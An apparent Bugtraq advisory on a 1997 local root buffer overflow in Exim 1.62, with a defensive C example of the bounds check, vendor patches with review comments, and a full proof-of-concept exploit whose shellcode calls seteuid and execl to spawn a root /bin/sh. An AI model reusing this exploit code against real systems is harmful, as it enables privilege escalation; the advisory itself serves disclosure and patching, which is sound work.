Exim Buffer Overflow Vulnerability
BID:1859
Info
| Bugtraq ID: | 1859 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Jul 21 1997 12:00AM |
| Updated: | Jul 21 1997 12:00AM |
| Credit: | This vulnerability was reported to Bugtraq by D. J. Bernstein <[email protected]>. Two patches were supplied by Philip Hazel. |
| Vulnerable: | University of Cambridge Exim 1.6.51, University of Cambridge Exim 1.6.2 |
| Not Vulnerable: | University of Cambridge Exim 3.0 x, University of Cambridge Exim 2.0 x |
Discussion
A potential local root-yielding buffer overflow vulnerability exists in Exim mail client version 1.62.
A buffer used in processing filenames of message attachments can be overflowed by a maliciously formed filename. As a result, the excess data copied onto the stack can overwrite critical parts of the stack frame, such as the calling function's return address. Since this data is supplied by the user, it can be crafted to alter the program's flow of execution. If properly exploited, this can yield root privileges to the attacker.
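To show what the bounds check in the vendor patch (see Solution / Fix) protects against, here is an added example that is not Exim's code: a small parser for the ":include:" directive that copies the file name into a fixed-size buffer only after checking its length. The function and constant names, the 255-byte limit and the inputs are assumptions modelled on the patch hunks; the unpatched version is the same routine with the "too long" check missing.

```c
/* Added example (not Exim's code): the length check from the 1.62 patch,
 * applied before copying an ":include:" file name into a fixed buffer.
 * Names, sizes and prefix handling are assumptions based on the hunks. */
#include <stdio.h>
#include <string.h>

#define INCL_NAME_MAX 255           /* the limit the patch enforces */
#define INCL_PREFIX   ":include:"   /* 9 characters, hence s+9 / len-9 */

/* Copy the file name following ":include:" in item s (length len) into
 * filename[INCL_NAME_MAX + 1]. Returns 0 on success, -1 with *error set
 * otherwise. Without the length check below, the strncpy writes past the
 * end of a stack buffer when the name is longer than INCL_NAME_MAX. */
int extract_include_name(const char *s, size_t len,
                         char filename[INCL_NAME_MAX + 1], const char **error)
{
    size_t plen = strlen(INCL_PREFIX);

    if (len < plen || memcmp(s, INCL_PREFIX, plen) != 0) {
        *error = "item is not an :include: directive";
        return -1;
    }
    if (len == plen) {
        *error = "file name missing after :include:";
        return -1;
    }
    /* The fix: reject before copying, bounding on the buffer's own size
     * so the check and the declaration cannot drift apart. */
    if (len - plen > INCL_NAME_MAX) {
        *error = "included file name is too long";
        return -1;
    }
    strncpy(filename, s + plen, len - plen);
    filename[len - plen] = 0;
    *error = NULL;
    return 0;
}

int main(void)
{
    char filename[INCL_NAME_MAX + 1];
    const char *err;
    char longitem[9 + 300];                  /* constructed: 300-byte name */
    memcpy(longitem, INCL_PREFIX, 9);
    memset(longitem + 9, 'A', 300);

    printf("%d\n", extract_include_name(":include:/etc/aliases", 21, filename, &err));
    printf("%s\n", filename);
    printf("%d %s\n", extract_include_name(longitem, sizeof longitem, filename, &err), err);
    return 0;
}
```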
Exploit / POC
Exploit provided by D. J. Bernstein <[email protected]>
/* sample code for one OS/compiler combination; ./this ./exim -bt you */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* the addresses below are specific to the author's own copy of exim */
char code[] = {
  0x31,0xc0                   /* eax = 0 */
, 0x50                        /* push eax */
, 0xbb,0x98,0x30,0x04,0x00    /* ebx = 0x43098; &seteuid in my copy of exim */
, 0xff,0xd3                   /* call ebx */
, 0x31,0xc0
, 0x50
, 0xb8,0x9a,0xd1,0x03,0x00    /* eax = 0x3d19a; &"/bin/sh" in my copy of exim */
, 0x50
, 0x50
, 0xbb,0xf8,0x29,0x04,0x00    /* ebx = 0x429f8; &execl in my copy of exim */
, 0xff,0xd3
, 0x00                        /* just to terminate the last string in the environment */
};
char buf[1000];   /* filled with nops, code placed at the end */
char *env[1001];  /* environment handed to the program via execve */

int main(int argc, char **argv)
{
    int i;
    int j;
    (void)argc;
    for (i = 0; i < (int)sizeof buf; ++i) buf[i] = 0x90; /* nop */
    memcpy(buf + sizeof buf - sizeof code, code, sizeof code);
    /* each NUL byte in buf starts a further environment string */
    j = 0;
    env[0] = buf;
    for (i = 0; i < (int)sizeof buf; ++i) if (!buf[i]) env[++j] = buf + i + 1;
    env[j] = 0;
    if (argv[1]) execve(argv[1], argv + 1, env);
    exit(1);
}
Solution / Fix
Solution:
The latest release of Exim is version 3.16. Versions before 2.0x should be upgraded; 3.0x releases are also best upgraded.
See www.exim.org.
Patches supplied by the author for versions 1.62 and 1.651:
--------------------------------------------------------------------
*** exim-1.62/src/parse.c Wed Apr 16 14:34:49 1997
--- parse.c Tue Jul 22 09:41:50 1997
***************
*** 1037,1042 ****
--- 1037,1048 ----
int extracted;
FILE *f;
+ if (len-9 > 255)
+ {
+ *error = "included file name is too long";
+ return -1;
+ }
+
strncpy(filename, s+9, len-9);
filename[len-9] = 0;
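Review bot: the new bound in `+ if (len-9 > 255)` hard-codes 255 instead of deriving it from the declaration of `filename`, whose size is not visible in this hunk; if the two ever drift apart, `strncpy(filename, s+9, len-9);` overruns the buffer again exactly as before. Suggest `if (len-9 > sizeof(filename)-1)` or a single named constant used for both the array size and the check. Minor style point: `*error` is set to a bare literal here, whereas the 1.651 hunk builds it with string_sprintf; keeping the two consistent avoids callers having to care whether the string is static or allocated.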
---snip--------------------------------------------------------------------
*** exim-1.651/src/parse.c Fri Jul 4 16:33:56 1997
--- parse.c Tue Jul 22 09:31:54 1997
***************
*** 1056,1061 ****
--- 1056,1067 ----
*error = string_sprintf("file name missing after :include:");
return -1;
}
+
+ if (flen > 255)
+ {
+ *error = string_sprintf("included file name \"%s\" is too long", t);
+ return -1;
+ }
strncpy(filename, t, flen);
filename[flen] = 0;
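Review bot: the `"%s"` in `*error = string_sprintf("included file name \"%s\" is too long", t);` echoes the full user-supplied name even though the check immediately above has just established that it exceeds 255 bytes, so the error string grows without bound with the rejected input. Suggest a width-limited conversion such as `%.60s`, or reporting only the length, so that an overlong include name cannot inflate the message. As in the 1.62 hunk, the 255 in `if (flen > 255)` should be tied to the size of `filename` rather than repeated as a magic number.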
--------------------------------------------------------------------